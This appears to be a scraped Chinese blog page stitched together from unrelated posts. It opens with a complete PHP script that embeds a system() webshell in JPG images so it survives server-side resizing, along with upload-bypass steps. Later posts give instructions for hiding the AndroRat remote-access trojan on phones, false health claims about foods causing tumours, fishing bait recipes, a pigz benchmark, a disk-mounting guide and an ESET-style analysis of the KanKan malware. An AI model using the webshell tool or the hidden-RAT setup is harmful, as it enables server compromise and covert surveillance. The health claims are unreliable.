之前有人发布了 利用PNG 图片上述压缩函数的方法 原理利用
PNG的结构IDAT chunks填充一句话webshell，并进行一套取模运算  详见：
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

但是受限于  图像的尺寸 必须320×320 且必须是PNG格式

那JPG怎么办

神奇的老外 提出了列方法

<?php
        /*

        The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations
        caused by PHP functions imagecopyresized() and imagecopyresampled().
        It is necessary that the size and quality of the initial image are the same as those of the processed
        image.

        1) Upload an arbitrary image via secured files upload script
        2) Save the processed image and launch:
        php jpg_payload.php <jpg_name.jpg>

        In case of successful injection you will get a specially crafted image, which should be uploaded again.

        Since the most straightforward injection method is used, the following problems can occur:
        1) After the second processing the injected data may become partially corrupted.
        2) The jpg_payload.php script outputs “Something’s wrong”.
        If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another
        initial image.

        Sergey Bobrov @Black2Fan.

        See also:
        https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

        */

        $miniPayload = ‘<?=system($_GET[c]);?>’;

        if(!extension_loaded(‘gd’) || !function_exists(‘imagecreatefromjpeg’)) {
        die(‘php-gd is not installed’);
        }
      
        if(!isset($argv[1])) {
                die(‘php jpg_payload.php <jpg_name.jpg>’);
        }

        set_error_handler(“custom_error_handler”);

        for($pad = 0; $pad < 1024; $pad++) {
                $nullbytePayloadSize = $pad;
                $dis = new DataInputStream($argv[1]);
                $outStream = file_get_contents($argv[1]);
                $extraBytes = 0;
                $correctImage = TRUE;

                if($dis->readShort() != 0xFFD8) {
                        die(‘Incorrect SOI marker’);
                }

                while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
                        $marker = $dis->readByte();
                        $size = $dis->readShort() – 2;
                        $dis->skip($size);
                        if($marker === 0xDA) {
                                $startPos = $dis->seek();
                                $outStreamTmp =
                                        substr($outStream, 0, $startPos) .
                                        $miniPayload .
                                        str_repeat(“\0”,$nullbytePayloadSize) .
                                        substr($outStream, $startPos);
                                checkImage(‘_’.$argv[1], $outStreamTmp, TRUE);
                                if($extraBytes !== 0) {
                                        while((!$dis->eof())) {
                                                if($dis->readByte() === 0xFF) {
                                                        if($dis->readByte !== 0x00) {
                                                                break;
                                                        }
                                                }
                                        }
                                        $stopPos = $dis->seek() – 2;
                                        $imageStreamSize = $stopPos – $startPos;
                                        $outStream =
                                                substr($outStream, 0, $startPos) .
                                                $miniPayload .
                                                substr(
                                                        str_repeat(“\0”,$nullbytePayloadSize).
                                                                substr($outStream, $startPos, $imageStreamSize),
                                                        0,
                                                        $nullbytePayloadSize+$imageStreamSize-$extraBytes) .
                                                                substr($outStream, $stopPos);
                                } elseif($correctImage) {
                                        $outStream = $outStreamTmp;
                                } else {
                                        break;
                                }
                                if(checkImage(‘payload_’.$argv[1], $outStream)) {
                                        die(‘Success!’);
                                } else {
                                        break;
                                }
                        }
                }
        }
        unlink(‘payload_’.$argv[1]);
        die(‘Something\’s wrong’);

        function checkImage($filename, $data, $unlink = FALSE) {
                global $correctImage;
                file_put_contents($filename, $data);
                $correctImage = TRUE;
                imagecreatefromjpeg($filename);
                if($unlink)
                        unlink($filename);
                return $correctImage;
        }

        function custom_error_handler($errno, $errstr, $errfile, $errline) {
                global $extraBytes, $correctImage;
                $correctImage = FALSE;
                if(preg_match(‘/(\d+) extraneous bytes before marker/’, $errstr, $m)) {
                        if(isset($m[1])) {
                                $extraBytes = (int)$m[1];
                        }
                }
        }

        class DataInputStream {
                private $binData;
                private $order;
                private $size;

                public function __construct($filename, $order = false, $fromString = false) {
                        $this->binData = ”;
                        $this->order = $order;
                        if(!$fromString) {
                                if(!file_exists($filename) || !is_file($filename))
                                        die(‘File not exists [‘.$filename.’]’);
                                $this->binData = file_get_contents($filename);
                        } else {
                                $this->binData = $filename;
                        }
                        $this->size = strlen($this->binData);
                }

                public function seek() {
                        return ($this->size – strlen($this->binData));
                }

                public function skip($skip) {
                        $this->binData = substr($this->binData, $skip);
                }

                public function readByte() {
                        if($this->eof()) {
                                die(‘End Of File’);
                        }
                        $byte = substr($this->binData, 0, 1);
                        $this->binData = substr($this->binData, 1);
                        return ord($byte);
                }

                public function readShort() {
                        if(strlen($this->binData) < 2) {
                                die(‘End Of File’);
                        }
                        $short = substr($this->binData, 0, 2);
                        $this->binData = substr($this->binData, 2);
                        if($this->order) {
                                $short = (ord($short[1]) << 8) + ord($short[0]);
                        } else {
                                $short = (ord($short[0]) << 8) + ord($short[1]);
                        }
                        return $short;
                }

                public function eof() {
                        return !$this->binData||(strlen($this->binData) === 0);
                }
        }
?>

http://pastebin.com/3cznqi8P
具体方法 时:
1.  你先要 上传你想要构造的图片马原片
2.  等网站生成完缩略图下载下来
3.  用上述脚本 生成带图片的 木马
4.  重新上传到网站     结束

这个也要看运气成分

△芒果是止血的，但是来月经的人不要吃；否则就会产生子宫肌瘤！△韭菜具有壮阳的作用，小孩子不能吃。南瓜具有升压、止喘的作用，高血压的人不能吃。 
△芥菜、茴香菜、蒜薹、青蒜、洋葱头、柿子椒具有温里的作用，发热的人不能吃。 
△山药、山药蛋具有补气的作用，失眠的人不能吃。
△马齿苋、芋头、苦瓜、雪里红具有清热的作用，阳痿的人不能吃。 
△茄子、扁豆、豇豆、荷兰豆、毛豆具有行气的作用，腹泻的人不能吃。 
△香椿具有安神的作用，从事敏捷工作的人不能吃。
△菜花、百合具有滋阴的作用，水肿的人不能吃。 
△菠菜、竹笋、茼蒿具有酸涩的作用，便秘的人不能吃。 
△荠菜、空心菜、黄花菜具有止血的作用，有血栓的人不能吃。
△苋菜、卷心菜具有补血的作用，血液黏稠的人不能吃。 
△芹菜、白菜、小白菜、油菜、生菜、茭白、菜笋、冬瓜、葫芦瓜具有利尿的作用，糖尿病、高血压、口干舌燥的人不能吃。 
△香菜具有发汗的作用，汗多的人不能吃。△灵芝、冬笋、紫菜具有化痰的作用，癌症病人不能吃。 
△蘑菇、黑木耳、白木耳、石耳、地耳具有泻下的作用，腹泻的人不能吃。 
△丝瓜、蕨菜、芦荟具有活血的作用，癌症病人不能吃。然而许多人乱吃，因此吃出病来；而有病之后还乱吃，因此不能痊愈。 
△核桃是壮阳的，但是癌病人不要吃；否则肿块就会长大。 
△枇杷、银杏是止咳的，但是不咳嗽不要吃；否则就会头晕腹胀。
△荔枝是温里的，但是癌病人不要吃；否则肿块就会长大。 
△大枣是补气的，但是不疲乏不要吃；否则就会失眠。 
△橄榄、罗汉果是清热的，但是阳痿的年轻人不要吃；否则就会阴茎疲软。△香橼、佛手是行气的，但是不腹胀不要吃；否则就会拉稀。 
△龙眼是安神的，但是疲乏的人不要吃；否则就会嗜睡。 
△柠檬是滋阴的，但是癌病人不要吃；否则肿块就会水肿。
△芭蕉、橘子、橙子、樱桃、柿子、石榴、杨梅、杨桃、木瓜、莲子、山竹果是止泻的，但是便秘的人不要吃；否则就会更加便秘。 
△芒果是止血的，但是来月经的人不要吃；否则就会产生子宫肌瘤。 
△酸藤果是补血的，但是血黏稠的人不要吃；否则就会发生血栓。
△西瓜、甜瓜、葡萄、柑子、猕猴桃、菠萝、菱角、草莓是利尿的，但是高血压、糖尿病人不要吃；否则就会增加血黏度。 
△椰子水是解表的，但是不感冒的人不要吃；否则就会多汗伤阴。 
△金橘、柚子、荸荠、花生是化痰的，但是癌病人不要吃；否则就会造成肿块破溃。
△梨子、香蕉、无花果、桑椹子、松子、酸角是泻下的，但是慢性结肠炎的人不要吃；否则就会洞泻不止。 
△桃子、栗子、薜荔果是活血的，但是癌病人不要吃；否则就会造成肿块转移。 
△香榧子、榛子、槟榔是杀虫的，但是肝炎病人不要吃；否则就会造成肝损害。有人说，桃子保人杏伤人，李树底下埋新坟，似乎桃子最安全。错了，自古以来，苹果的药性平和，最适合一般人使用。

1：钓鱼百法百中法：将中药阿魏研末拌蚯蚓当鱼铒，鱼闻味争相抢食，引法无不上钓，百法百中

2：丁香油混合蚯蚓钓鱼，无论钓何种鱼类，都获得成功，鱼类上钓率很高，比单纯以蚯蚓作诱铒法提高6—8倍以上，用此法钓塘角鱼时、更会频频上钓，用法：（三两鲜蚯蚓，则用一钱丁 香油）在放钓前将蚯蚓与丁香油混合拌匀，时间不用过长，尤其不能过夜，应随拌随用，如果时间过长，丁香油挥发会影响钓鱼效果，

3：钓鲤鱼百发百中，咖啡一两，胡椒粉五钱共研磨，加入蛋清三个，面粉一两搅拌成团，拧成豆大即成药铒。

4：钓鱼偏方，1、用味精的效果要比用安基酸效果好。2、用玉米软糖钓鲤鱼，不用附加任何东西，一年四季通用，便宜又实惠，上鱼又多。3、把腰果碾碎，和基础铒和在一起，别的添加剂不放或少放。

5：窝料秘方、1、用料：买一两斤韭菜、切碎、到钓点后用泥和在一起、用一半打窝，其余的用来续窝，主聚：鲤、鲫

2、用料：大米、玉米面、菜籽饼、先分别将大米，玉米面，菜籽饼用文火炒香，趁热倒入适量香油拌匀略、炒片刻，装瓶后用曲洒浸泡，曲酒度越高越好。

3、用料：二斤大米、一斤小米、半斤面粉、半斤曲酒、半玦酒药，制法：将大米、小米用开水浸泡5分钟，将酒药敲碎成粉末与面粉拌匀，最后将上述各料拌匀，装入广囗瓶放在太阳下日晒夜露，一年后可使用，时间越长越好。（特效）

pig是个啥东东？
官网：http://zlib.net/pigz
一句话简介：

A parallel implementation of gzip for modernmulti-processor, multi-core machines。

简单的说，就是支持并行的gzip。废话不多说，开始测试。

pig默认用当前逻辑cpu个数来并发压缩，无法检测个数的话，则并发8个线程。

一、测试压缩包文件1
压缩前
-rw-r--r-- 1 root root 2474772480 Dec  3 19:54 dbs.tar

1、gzip测试
压缩耗时，CPU最高：101.6%
real    2m18.042s
user    2m10.204s
sys     0m6.876s

解压缩耗时，CPU最高：101.6%
real    0m26.756s
user    0m20.175s
sys     0m6.580s

压缩后
-rw-r--r-- 1 root root 2349563863 Dec  3 19:54 dbs.tar.gz

2、pigz测试
并发8线程(默认)：
压缩耗时，CPU最高：832%
real    0m21.710s
user    2m31.229s
sys     0m9.101s

解压缩耗时，CPU最高：199%
real    0m13.239s
user    0m11.791s
sys     0m12.426s

并发4线程：
压缩耗时，CPU最高：427.6%
real    0m38.299s
user    2m30.701s
sys     0m8.369s

解压缩耗时，CPU最高：202%
real    0m13.294s
user    0m12.154s
sys     0m11.862s

压缩后
-rw-r--r-- 1 root root 2350161547 Dec  3 19:54 dbs.tar.gz

二、测试压缩包文件2
压缩前
-rw-r--r-- 1 root root 5248890880 Dec  3 20:26 mysql-5.5.28-linux2.6-x86_64.tar

1、gzip测试
压缩耗时，CPU最高：101%
real    6m20.524s
user    6m2.466s
sys     0m7.410s

解压缩耗时，CPU最高： 101%
real    0m58.893s
user    0m46.258s
sys     0m11.944s

压缩后
-rw-r--r-- 1 root root 1410045513 Dec  3 20:26 mysql-5.5.28-linux2.6-x86_64.tar.gz

2、pigz测试
并发8线程(默认)：
压缩耗时，CPU最高： 799%
real    1m11.908s
user    6m36.717s
sys     0m9.860s

解压缩耗时，CPU最高：179%
real    0m33.188s
user    0m38.069s
sys     0m16.728s

并发4线程：
压缩耗时，CPU最高： 418%
real    1m41.547s
user    6m36.782s
sys     0m9.806s

解压缩耗时，CPU最高： 179%
real    0m33.120s
user    0m37.500s
sys     0m16.956s

压缩后
-rw-r--r-- 1 root root 1406061442 Dec  3 20:26 mysql-5.5.28-linux2.6-x86_64.tar.gz

结论：

1、pigz默认用法(默认并发线程是逻辑cpu个数)可比gzip快5.3倍，CPU消耗则是gzip的8倍，压缩比则相当；
2、并发8线程对比4线程提升：41.2%，16线程对比8线程提升：27.9%，32线程对比16线程提升：3%；
3、在对压缩效率要求较高、但对短时间内CPU消耗较高不受影响的场景，使用pigz非常合适。

http://www.sitedossier.com/parentdomain/baidu.com

看我是怎样改造Android远程控制工具AndroRat

1.修改布局界面
2.配置默认远程ip和端口
3.LauncherActivity修改为运行后自动开启服务并自动返回到主界面
4.修改xml让程序不显示在最新使用的程序

0x00 搭建andriod环境

对于小白来说，首先需要的开发环境是必须

1.eclipse
2.jdk
3.sdk

安装配置好后就将我们的AndroRat工程导入eclipse中

导入完成后看见2个工程如图：

刚导入进来时肯定会编译报错，这时需将2个jra包引用进来 如图：

其他报错如import 缺少对应包可到http://www.findjar.com/index.x查找并引用

编译错误解决完成后就会出现黄色感叹号，这个时候2个工程就可以运行了。

0x01 安装androrat

先运行我们的服务端开启监听 默认config.txt配置端口

运行成功后出现服务端如下：

接着运行客户端，使用usb链接我们的手机安装app查看

安装好后应用列表会有一个叫LogsProvider的应用，可以在如下文件里修改name

接着修改LauncherActivity.class代码让程序默认情动并运行后自动black

Manifest修改，使其不在home最近应用里显示

布局文件位置，可以自定义修改布局

adb 安装运行客户端后，服务端如图，-手机安装程序后会自动返回到桌面，长按home也看不到该程序。

此时整个程序可以使用了，功能挺多的就不列举了

0x02 引申思考

1.如把修改app写成服务，监听短信指定代码开启端口 （老外都这样干的）

2.andriod里的gps功能和拍照功能有bug 这可是两个亮点功能，擦

3.实现程序的自动编写，屏蔽扫描杀软，自我复制和感染文件（这还是留个大牛们研究）

http://url.cn/Ke7wxT微云源码分享地址

先通过fdisk -l查看目前磁盘分区状况

 [root@MyVPS ~]# fdisk -l
Disk /dev/xvda: 8589 MB, 8589934592 bytes
255 heads, 63 sectors/track, 1044 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/xvda1 * 1 13 104391 83 Linux
/dev/xvda2 14 1044 8281507+ 8e Linux LVM
Disk /dev/xvdb: 23.6 GB, 23622320128 bytes
255 heads, 63 sectors/track, 2871 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System

 我们可以看到/dev/xvdb容量有23.6G，而且没有分区，接下来我们对它进行分区和挂载
 

# fdisk /dev/xvdb

 [root@MyVPS ~]# fdisk /dev/xvdb
The number of cylinders for this disk is set to 2871.
There is nothing wrong with that, but this is larger than 1024,
and could in certain setups cause problems with:
1) software that runs at boot time (e.g., old versions of LILO)
2) booting and partitioning software from other OSs
(e.g., DOS FDISK, OS/2 FDISK)
输入n新建分区
Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
/dev/xvdb中第1个分区
Partition number (1-4): 1
First cylinder (1-2871, default 1):
Using default value 1
Last cylinder or +size or +sizeM or +sizeK (1-2871, default 2871):
Using default value 2871
输入W保存退出
Command (m for help): w
The partition table has been altered!
Calling ioctl() to re-read partition table.
Syncing disks.

通过上述步骤我们已将/dev/xvdb分区完成，下面我们对分区格式化并进行挂载

将新分区xvdb1(此名称因系统而异)格式化为ext3格式
 

# mkfs -t ext3 /dev/xvdb1

[root@MyVPS ~]# mkfs -t ext4 /dev/xvdb1
mke2fs 1.39 (29-May-2006)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
2883584 inodes, 5765319 blocks
288265 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=4294967296
176 block groups
32768 blocks per group, 32768 fragments per group
16384 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000
Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done
This filesystem will be automatically checked every 24 mounts or
180 days, whichever comes first. Use tune2fs -c or -i to override.

将新分区xvdb1挂载，我们示例挂载到/home1目录。新建目录/home1，然后挂载：

# mkdir /home1   /*建立home1目录*/
# mount /dev/xvdb1 /home1    /*挂载到home1目录*/

完成后我们通过df -hal可以看到，新分区已经挂载到目录/home1上了
 

[root@MyVPS ~]# df -hal
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
5.7G 1.4G 4.1G 25% /
proc 0 0 0 – /proc
sysfs 0 0 0 – /sys
devpts 0 0 0 – /dev/pts
/dev/xvda1 99M 28M 67M 30% /boot
tmpfs 256M 0 256M 0% /dev/shm
none 0 0 0 – /proc/sys/fs/binfmt_misc
sunrpc 0 0 0 – /var/lib/nfs/rpc_pipefs
/dev/xvdb1 22G 173M 21G 1% /home1
然后编辑/etc/fstab使分区在开机时自动挂载到home1

# echo “/dev/xvdb1 /home1 ext4 defaults 1 2” >> /etc/fstab

通过上述步骤已经完成硬盘未分区部分分区和挂载，并实现开机时自动挂载。在ThinkVM后台重装系统时，只要选择只格系统盘就可实现重装而不丢失新分区数据。

重装系统后，不用重新分区，直接按上面挂载分区步骤进行挂载即可读取该分区数据。

背景介绍

今年7月27日，迅雷爆出病毒门，网友称发现一个位于C:\Windows\System32目录下、名为“INPEnhSvc.exe”、带有迅雷数字签名的文件有问题。网络上的新闻虽然不少，但大多都是八卦和概念性的描述，本文是由国外的小伙伴写的一篇纯技术分析。

概述

最近ESET杀毒软件检测到一款名为Win32/KanKan的恶意软件.它有一下3个重要特征:

1. 尽管自身没有办公软件的功能,但是在注册表里注册了一个办公插件,目的纯粹是为了更长久的在系统中存活.
2. 所有连接到受感染电脑的安卓手机都会被悄悄的安装多个APP.
3. 这款恶意软件拥有迅雷网络技术有限公司的签名.

详细分析

恶意软件的签名信息如下:

这个恶意软件是一个windows安装程序,文件名为INPEnhSetup.exe.开始运行的时候会连接kkyouxi.stat.kankan.com 发送初始化消息.然后释放3个文件:INPEn.dll, INPEnhUD.exe和INPEnhSvc.exe.之后加载库文件INPEn.dll到内存,调用它的 DllRegisterServer函数.最后安装程序又向域名kkyouxi.stat.kankan.com发送安装完成消息.

INPEn.dll

INPEn.dll运行时会安装一个Word,Excel,PowerPoint的名为InputEnhance的插件.通过创建一个注册表项使得办公软件每次启动就会加载这个插件,从而达到隐蔽运行的目的.

dll文件运行之后会读取conf.kklm.n0808.com/tools.ini这个文件.

这个文件包含了多个参数.其中Tools和VID用base64编码过.

Tools解码后如下:

taskmgr.exe|tasklist.exe|procexp.exe|procmon.exe|devenv.exe|windbg.exe|filemon.exe|ollyice.exe|ollydbg.exe|processspy.exe|spyxx.exe|cv.exe|wireshark.exe

显然是检测这些工具是否运行,如果存在dll文件会停止运行,避免被发现.值得一提的这个列表里并只有分析工具,没有杀毒软件.看来作者的目的是为了防止软件被发现.

dll文件运行之后还会通过访问baidu.com,qq.com等域名来检测网络是否通畅.如果没有联网就周期性的检测网络连接.

INPEnhUD.exe

一旦网络连接建立,它就会执行INPEnhUD.exe.我们称这个文件为更新程序.它首先访问这个URL:

update.kklm.n0808.com/officeaddinupdate.xml.

officeaddinupdate.xml当前的内容如下:

这个xml文件包含一个url和md5 hash的列表.INPEnhUD.exe会下载没一个url里的文件,然后比对md5,如果通过就执行这个文件.

当前xml里只有一个Uninstall.exe,现在该软件下载这个程序会把自己卸载掉.当下载完列表里的程序后,最后会执行第三个文件,INPEnhSvc.exe.

INPEnhSvc.exe

INPEnhSvc.exe是这3个文件架构的最核心.它获取一个包含7个命令的XML配置文件.7个命令可以分为下面两组:

local commands: scanreg, scandesktop, scanfavorites
outsourced commands: installpcapp, installphoneapp, setdesktopshortcut, addfavorites, setiestartpage

整个程序的架构可以用下图表示:

下面分析一下我们最感兴趣的”installphoneapp”命令.其实大多数命令都可以从它的名字看出他大概的作用.”installphoneapp”会下载一些安卓应用,然后安装到连接到该电脑的手机上.

当我们开始调查的时候,这些安卓应用已经不能下载了.我们在中国的一些安全论坛里找到几个样本.下面是这些应用的截图.

下图是ESET每天检测到的这个名为 Win32/kankan软件的安装数据.